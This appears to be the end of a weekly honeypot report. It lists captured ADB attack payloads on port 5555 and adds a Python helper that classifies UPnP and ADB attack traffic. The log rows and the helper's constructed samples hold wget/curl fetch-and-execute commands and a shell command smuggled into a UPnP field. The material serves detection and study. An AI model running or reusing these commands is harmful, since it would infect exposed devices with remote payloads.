5555 | 84[.]219[.]223[.]57 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 88[.]129[.]182[.]215 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 92[.]35[.]169[.]79 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... | 1 |
5555 | 95[.]9[.]228[.]72 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
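As an added example (not part of the original post), a small Python triage helper for captures shaped like the rows above. It parses the UPnP AddPortMapping body of the port-52869 requests and flags a NewInternalClient that is not an IP address (the field is supposed to name the LAN host, so a shell command in it is the injection indicator), and it recognises the ADB (port 5555) shell payloads that fetch a script and run it. The sample payloads, source IPs and detection counts are constructed here; the hxxp URLs and xxx.xxx.xxx.xxx hosts are placeholders.

```python
import ipaddress
import re
from collections import Counter
from xml.etree import ElementTree as ET

UPNP_NS = "urn:schemas-upnp-org:service:WANIPConnection:1"
INJECTED_CLIENT = "`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/seraph.mips -O seraph`"  # constructed
# Constructed ADB sample modelled on the port-5555 rows (non-printables shown as '.').
ADB_DROPPER = (
    "CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; "
    "busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; "
    "curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c."
)

def make_upnp_request(internal_client: str) -> str:
    """Constructed AddPortMapping request shaped like the port-52869 captures
    (the honeypot dump renders CR/LF as '.', which is reproduced here)."""
    return (
        "POST /picsdesc.xml HTTP/1.1..Host: xxx.xxx.xxx.xxx:52869.."
        "SOAPAction: " + UPNP_NS + "#AddPortMapping...."
        '<?xml version="1.0" ?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
        '<u:AddPortMapping xmlns:u="' + UPNP_NS + '">'
        "<NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort>"
        "<NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort>"
        "<NewInternalClient>" + internal_client + "</NewInternalClient>"
        "<NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing"
        "</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration>"
        "</u:AddPortMapping></s:Body></s:Envelope>"
    )

def upnp_internal_client(payload: str):
    """Return the NewInternalClient text of an AddPortMapping call, or None
    when the payload holds no parseable AddPortMapping envelope."""
    m = re.search(r"<\?xml.*?</\w*:?Envelope>", payload, re.S)
    if not m:
        return None
    try:
        root = ET.fromstring(m.group(0))
    except ET.ParseError:
        return None
    node = root.find(".//{%s}AddPortMapping/NewInternalClient" % UPNP_NS)
    return None if node is None else (node.text or "").strip()

def classify(payload: str) -> str:
    """Label one captured payload for triage."""
    client = upnp_internal_client(payload)
    if client is not None:
        try:
            ipaddress.ip_address(client)      # the field is meant to hold a LAN address
            return "upnp-addportmapping"
        except ValueError:
            return "upnp-command-injection"   # anything else is an injected command
    if payload.startswith("CNXN") and "shell:" in payload:
        cmd = payload.split("shell:", 1)[1]
        # fetch-then-execute chain: a downloader followed by "sh <file>"
        if re.search(r"\b(wget|curl)\b", cmd) and re.search(r"\bsh\b", cmd):
            return "adb-shell-dropper"
        return "adb-shell"
    return "other"

# Constructed rows: (destination port, source IP, detections, payload).
SAMPLE_ROWS = [
    (52869, "203.0.113.10", 27, make_upnp_request(INJECTED_CLIENT)),
    (52869, "198.51.100.5", 3, make_upnp_request("192.168.1.20")),
    (5555, "203.0.113.12", 6, ADB_DROPPER),
    (8022, "198.51.100.9", 156, "SSH-2.0-libssh2_1.7.0\r\n"),
]

def triage(rows):
    """Sum detection counts per (destination port, label)."""
    totals = Counter()
    for port, _src, count, payload in rows:
        totals[(port, classify(payload))] += count
    return totals
```

Rows whose SOAP body was stringified with extra '.' between tags (as in some captures above) will not parse and fall into "other"; run the classifier on the raw request bytes rather than the honeypot's printable rendering to avoid that.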
That's all for this week.